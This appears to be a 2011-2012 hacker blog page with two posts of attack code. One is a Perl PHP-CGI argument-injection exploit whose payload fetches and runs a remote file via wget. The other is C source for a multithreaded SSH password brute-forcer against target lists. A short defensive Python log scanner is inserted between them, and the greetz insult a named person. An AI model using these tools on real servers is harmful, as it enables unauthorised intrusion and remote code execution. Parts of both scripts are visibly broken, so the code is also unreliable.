
[Exploit Updated]: PHP CGI – executes a payload which is php shellexec(); , My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so pls don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec()

which IS a PHP CGI function, and the ONLY way it will definitely exec!

ALSO this CAN execute cmds ofc, I will add in a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–
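
A defender-side check for the request shape the script above builds, added here as an example (not the author's code): it flags access-log entries whose query string has no unencoded `=` and decodes to `-`-prefixed arguments, which is how a CGI binary receives command-line switches (RFC 3875, section 4.4). The log lines, addresses, the PLACEHOLDER value and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request part of a common/combined log format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def cgi_args(target):
    """Return the '-'-prefixed arguments a CGI binary would see in argv.

    Per RFC 3875 section 4.4, a query string with no unencoded '=' is split
    on '+', each part is URL-decoded, and the parts become the command line.
    Assumption of this example: any part starting with '-' is suspicious.
    """
    _, _, query = target.partition("?")
    if not query or "=" in query:
        return []  # ordinary key=value query, never passed as argv
    args = [unquote(part) for part in query.split("+")]
    return [a for a in args if a.startswith("-")]

def scan(lines):
    """Return (client_ip, method, args) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed or non-HTTP entry
        args = cgi_args(m.group("target"))
        if args:
            hits.append((line.split(" ", 1)[0], m.group("method"), args))
    return hits

# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2012:10:00:01 +0000] "GET /index.php?id=5&sort=-date HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/May/2012:10:00:02 +0000] "POST //cgi-bin/?-d%20allow_url_include%3DOn'
    '+-d%20auto_prepend_file%3DPLACEHOLDER HTTP/1.1" 200 90',
    '192.0.2.11 - - [06/May/2012:10:00:03 +0000] "GET /isindex?foo+bar HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for ip, method, args in scan(SAMPLE_LOG):
        print(f"{ip} {method} passes switches to CGI: {args}")
```

The same test works as a front-end filter: rejecting requests to CGI handlers whose query lacks an unencoded `=` and starts with `-` removes this request shape before it reaches the interpreter.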

Win32 SSHd Bruter

Posted on 24th September 2011 in Codes

This is sshd bruter code for win32.

#include <windows.h>
#include <winbase.h>
#include <stdio.h>
#include <string.h>
#include <sdk/win32-pthreads.h>  // you can move this to SDK folder ;) 

#define malefic malloc(256)
#define oneshot(x) ((x) - 1)

void usage(char *arg) {
fprintf(stderr, "Usage: %s <targets> <weak-pass-file> <port 22 [22 = default sshd]>\n",arg);
exit(EXIT_FAILURE);
}

//void thread_ownage(char *target,int port, char *fname){

void thread_ownage(void *passthru) {
struct info *test;
bzero(&test, sizeof(test)); // here is zero. te problem is this
test = (struct info *)passthru;
char *fname = malefic;
fname = test->filename;
char *target = malefic;
bzero(&target,sizeof(target));
target = test->host;
int port = test->port;
//printf("[D] DEBUG INSIDE THREAD_OWNAGE  %s DEBUG PORT %d\n",test->host,test->port);
FILE *race;
int record; // which is this?nope target port fname are
int m = count_data(fname);
//printf("[D] DEBUG PASS FILE  %s\n",fname);
struct pass {
char passwd[256];
} load[m];
if ((race = fopen(fname,"r")) == NULL) {
perror("fopen");
exit(-1);
}
//load passes
record = 0;
while(!feof(race)) {
fscanf(race,"%s",load[record].passwd);
record++;
}
for(record = 0; record < oneshot(m) ; record++) {
}
for(record = 0; record < oneshot(m) ; record++) {
int c = 0;
char lol[256];
bzero(lol,sizeof(lol));
char *string = load[record].passwd;
while( *string != '\0') {
sprintf(&lol1,"%c",*string++);
}
printf("[*] Attacking Target: %s on port: %d with weak user/pass: %s\n",target,port,lol);
weak_hack(target,target,port,lol,lol);
}
}

int main(int argc, char **argv) {
FILE *into;
char *targetfile = NULL;
int port;
if (argc != 4) {
usage(argv[0]);
}
targetfile = argv[1];
char *passfile = argv[2];
port = atoi(argv[3]);
int record = 0;
int npthread = count_data(targetfile);
struct targets {
char targets[256];
} list[npthread];
int tcounter;
pthread_t threads[(npthread-1)];
if ((into = fopen(targetfile,"r")) == NULL) {
perror("fopen");
exit(-1);
}
// load targets
record = 0;
while(!feof(into)) {
fscanf(into,"%s",list[record].targets); // remember last member is terminating file so remove it from thread etc..
record++;
}
// debug target list
for(record=0;record<oneshot(npthread);record++) {
printf("[!] TARGET: %s\n",list[record].targets);
}
struct info bla[npthread];
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE);
printf("[+] Creating threads: %d \n",oneshot(npthread));
for (tcounter=0;tcounter<oneshot(npthread);tcounter++) {
bla[tcounter].port = port;
bla[tcounter].host = list[tcounter].targets;
bla[tcounter].filename = passfile;
pthread_create(&threads[tcounter],&attr,(void *)thread_ownage,(void *)&bla[tcounter]);
sleep(2);
}
printf("[+] Joining threads: %d\n",oneshot(npthread));
for (tcounter = 0; tcounter < oneshot(npthread); tcounter++) {
pthread_join(threads[tcounter],NULL);
}
}

OK some updates here, for the pcap and pthreads, they DO make these for windows, do not panic! The links are simple: winpcap.org, TRY to find DevPack_3.0 and use this for pcap, or 3.1 latest…
Also, PLEASE use the pthreads windows sites, there are a few which are all linked from the main website, pthreads.org I believe .. they're very simple to then add to a local sdk/ folder, or just maybe try and add to your current sdks, modify your dsp file and go hard! XChange it in the code so there is only one directory for ALL your sdks, which is what I DO, or use the Botmakers Tute ;) , that's kind of a lame name for it, but it was directly from the src code of Agobot, and is about still the best way to configure the thing!
I add stdout/in tarball src, which is also win32 headers, that's great for cygwin builds too, and I have linked it to 2005, I just keep them separated as in partitions, but for my projects I have one folder which I always keep up to date as in ssl etc… so I just use that for all my stuff, and add if need for separate things/bots etc, it is just simpler :s.
I don't like a big folder full of src of project and src of other libs, but, like many things, you can usually safely add them to your project locally, like with pthreads, as folder pthreads, and pcap is devpack, and sdk, and v4 is newer, which is not as great for our bruter but heck it is a devpack, I'd still try to find at least a 3.1 … it is a bit harder but well worth it :s.
Anyhow, look forward to seeing you make a nice link for ME to use it ;)
Maybe I'll add in some things even, I seriously am in the middle of electrical storms, and have now got a dead gfx so 2 weeks in safemode now, and I have about 6 pcs so I think I'll fix it up with changing it for a nice core2duo :)
Cheers!
xd